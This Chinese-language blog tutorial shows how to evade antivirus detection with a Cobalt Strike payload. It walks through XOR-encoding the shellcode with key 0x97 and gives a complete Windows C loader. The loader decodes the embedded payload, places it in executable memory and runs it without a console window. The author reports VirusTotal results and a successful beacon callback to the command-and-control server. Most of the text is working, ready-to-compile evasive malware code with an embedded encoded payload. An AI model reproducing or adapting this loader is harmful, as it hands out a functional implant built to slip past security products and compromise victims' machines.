C编译xor加密shellcode免杀

生成shellcode

cs生成c格式shellcode

imgbed.cn图床

用010editor加密shellcode

Ctrl+Shift+V将shellcode复制到010editor中,选择Tools->Hex Operation->Binary Xor,设置运算数为0x97,将shellcode与0x97异或后生成新的shellcode

imgbed.cn图床

将shellcode与0x97异或后生成新的shellcode

imgbed.cn图床

Ctrl+Shift+c复制shellcode到Sublime text中,Ctrl+a选中全部将shellcode修改成c语言中的十六进制格式

imgbed.cn图床

Visual Studio编译生成exe文件

将xor加密后的shellcode与0x97异或还原后执行

imgbed.cn图床

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#include <windows.h>
#include <stdio.h>
typedef void(_stdcall *CODE)();
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] =
"\x6B\xDF\x14\x73\x67\x7F\x5F\x97\x97\x97\xD6\xC6\xD6\xC7\xC5\xC6"
"\xC1\xDF\xA6\x45\xF2\xDF\x1C\xC5\xF7\xDF\x1C\xC5\x8F\xDF\x1C\xC5"
"\xB7\xDF\x1C\xE5\xC7\xDF\x98\x20\xDD\xDD\xDA\xA6\x5E\xDF\xA6\x57"
"\x3B\xAB\xF6\xEB\x95\xBB\xB7\xD6\x56\x5E\x9A\xD6\x96\x56\x75\x7A"
"\xC5\xD6\xC6\xDF\x1C\xC5\xB7\x1C\xD5\xAB\xDF\x96\x47\xF1\x16\xEF"
"\x8F\x9C\x95\xE2\xE5\x1C\x17\x1F\x97\x97\x97\xDF\x12\x57\xE3\xF0"
"\xDF\x96\x47\xC7\x1C\xDF\x8F\xD3\x1C\xD7\xB7\xDE\x96\x47\x74\xC1"
"\xDF\x68\x5E\xD6\x1C\xA3\x1F\xDF\x96\x41\xDA\xA6\x5E\xDF\xA6\x57"
"\x3B\xD6\x56\x5E\x9A\xD6\x96\x56\xAF\x77\xE2\x66\xDB\x94\xDB\xB3"
"\x9F\xD2\xAE\x46\xE2\x4F\xCF\xD3\x1C\xD7\xB3\xDE\x96\x47\xF1\xD6"
"\x1C\x9B\xDF\xD3\x1C\xD7\x8B\xDE\x96\x47\xD6\x1C\x93\x1F\xDF\x96"
"\x47\xD6\xCF\xD6\xCF\xC9\xCE\xCD\xD6\xCF\xD6\xCE\xD6\xCD\xDF\x14"
"\x7B\xB7\xD6\xC5\x68\x77\xCF\xD6\xCE\xCD\xDF\x1C\x85\x7E\xD8\x68"
"\x68\x68\xCA\xFD\x97\xDE\x29\xE0\xFE\xF9\xFE\xF9\xF2\xE3\x97\xD6"
"\xC1\xDE\x1E\x71\xDB\x1E\x66\xD6\x2D\xDB\xE0\xB1\x90\x68\x42\xDF"
"\xA6\x5E\xDF\xA6\x45\xDA\xA6\x57\xDA\xA6\x5E\xD6\xC7\xD6\xC7\xD6"
"\x2D\xAD\xC1\xEE\x30\x68\x42\x7C\xE4\xCD\xDF\x1E\x56\xD6\x2F\xC7"
"\x97\x97\x97\xDA\xA6\x5E\xD6\xC6\xD6\xC6\xFD\x94\xD6\xC6\xD6\x2D"
"\xC0\x1E\x08\x51\x68\x42\x7C\xCE\xCC\xDF\x1E\x56\xDF\xA6\x45\xDE"
"\x1E\x4F\xDA\xA6\x5E\xC5\xFF\x97\x95\xD7\x13\xC5\xC5\xD6\x2D\x7C"
"\xC2\xB9\xAC\x68\x42\xDF\x1E\x51\xDF\x14\x54\xC7\xFD\x9D\xC8\xDF"
"\x1E\x66\xDF\x1E\x4D\xDE\x50\x57\x68\x68\x68\x68\xDA\xA6\x5E\xC5"
"\xC5\xD6\x2D\xBA\x91\x8F\xEC\x68\x42\x12\x57\x98\x12\x0A\x96\x97"
"\x97\xDF\x68\x58\x98\x13\x1B\x96\x97\x97\x7C\x44\x7E\x73\x96\x97"
"\x97\x7F\x35\x68\x68\x68\xB8\xED\xDE\xD1\xC3\x97\x78\x6F\xCF\x9C"
"\xEF\x6F\x7B\x00\x38\x66\xFD\xA8\xFF\x7B\xCF\xF8\x9A\x4B\xA7\x08"
"\x95\x69\x8B\x57\xDF\x10\xFE\x9E\xB6\x17\x81\xB4\xC6\x50\x5A\xE7"
"\xFD\x31\x7C\xF6\x3A\xD4\xCA\x4D\xA2\x00\x6B\xBF\x1D\xB4\x62\x1B"
"\xC6\xA3\x87\x19\xEE\x2E\xBA\x2A\x4B\xD8\x89\x65\xB2\xF3\xB0\xC8"
"\xF3\x1B\x92\x1A\xFF\x97\xC2\xE4\xF2\xE5\xBA\xD6\xF0\xF2\xF9\xE3"
"\xAD\xB7\xDA\xF8\xED\xFE\xFB\xFB\xF6\xB8\xA2\xB9\xA7\xB7\xBF\xF4"
"\xF8\xFA\xE7\xF6\xE3\xFE\xF5\xFB\xF2\xAC\xB7\xDA\xC4\xDE\xD2\xB7"
"\xA6\xA7\xB9\xA7\xAC\xB7\xC0\xFE\xF9\xF3\xF8\xE0\xE4\xB7\xD9\xC3"
"\xB7\xA1\xB9\xA5\xAC\xB7\xC0\xFE\xF9\xA1\xA3\xAC\xB7\xEF\xA1\xA3"
"\xAC\xB7\xC3\xE5\xFE\xF3\xF2\xF9\xE3\xB8\xA1\xB9\xA7\xBE\x9A\x9D"
"\x97\x64\xF1\xB2\xFD\x10\x92\x3B\x83\x57\x64\x8C\xAA\x47\xD8\x6B"
"\xB3\xE3\xBE\xF9\x75\x1C\xA5\xD6\x70\x91\xE2\xF2\x6A\xA1\xB6\xF0"
"\x32\x70\x6D\x9F\xE9\xD6\x2F\xA9\x34\x2F\x15\x73\xD8\x66\x8F\x20"
"\x1D\x9A\xCA\xBF\x50\x3C\x69\x66\xA7\x99\xB9\x80\xF3\xEF\x82\x8E"
"\xC2\xC5\x9A\x01\xD2\xDC\x79\x99\xEE\x32\x4C\x6C\xB0\x2E\x1E\xF0"
"\xCD\x26\x7C\xE3\x1D\x78\x82\xF1\xFD\x88\xB7\x23\x9D\xCC\x7A\x5A"
"\xE5\x46\xF0\xD7\xCA\xCC\x3E\xAB\xF5\x09\xBB\x3C\x52\x1E\xAB\x1A"
"\x3A\x2F\xF7\x1E\xF7\xCF\xA6\x2B\x93\xBF\xAB\xFB\xF7\x44\x2E\xD8"
"\x69\x64\x26\xD9\xB6\xB2\xB9\xDF\xF6\x27\x52\x8A\x1A\x26\x81\x14"
"\xFD\xD6\x88\xD6\x23\x1F\x6E\xFC\x09\x30\x57\xEC\x80\xE1\x14\xF9"
"\x62\x5A\x84\xA4\x85\xA1\xC8\xE2\x43\xFC\x6E\x18\x95\x90\x7E\x31"
"\x03\x78\x32\x18\x9A\x89\xDA\xAF\x84\x5B\x95\x21\x78\xF4\xA3\x7F"
"\x82\x36\x32\xE0\x44\x13\x1A\x39\xE2\x47\xE7\xED\xA3\x93\x80\x53"
"\x05\xCC\x5A\xBD\x3E\x97\xD6\x29\x67\x22\x35\xC1\x68\x42\xDF\xA6"
"\x5E\x2D\x97\x97\xD7\x97\xD6\x2F\x97\x87\x97\x97\xD6\x2E\xD7\x97"
"\x97\x97\xD6\x2D\xCF\x33\xC4\x72\x68\x42\xDF\x04\xC4\xC4\xDF\x1E"
"\x70\xDF\x1E\x66\xDF\x1E\x4D\xD6\x2F\x97\xB7\x97\x97\xDE\x1E\x6E"
"\xD6\x2D\x85\x01\x1E\x75\x68\x42\xDF\x14\x53\xB7\x12\x57\xE3\x21"
"\xF1\x1C\x90\xDF\x96\x54\x12\x57\xE2\x40\xCF\xCF\xCF\xDF\x92\x97"
"\x97\x97\x97\xC7\x54\x7F\x08\x6A\x68\x68\xA6\xAE\xA5\xB9\xA6\xA1"
"\xAF\xB9\xA5\xA7\xA3\xB9\xA6\xA3\xA4\x97\x85\xA3\xC1\xEF";

unsigned char xorshellcode[sizeof(shellcode)];

void main()
{
	for (int i = 0; i < sizeof(shellcode) - 1; i++)
	{
		xorshellcode[i] = shellcode[i]^0x97;
	}

	PVOID p = NULL;
	p = VirtualAlloc(NULL, sizeof(xorshellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (p == NULL)
	{
		return;
	}
	memcpy(p, xorshellcode, sizeof(xorshellcode));
	
	CODE code = (CODE)p;
	code();

}

免杀效果测试

VirusTotal查杀率15/69

imgbed.cn图床

火绒不杀,卡巴斯基拦截

imgbed.cn图床

imgbed.cn图床

cs上线

imgbed.cn图床

参考:

https://www.freebuf.com/articles/system/228233.html

https://uknowsec.cn/posts/notes/shellcode%E5%8A%A0%E8%BD%BD%E6%80%BB%E7%BB%93.html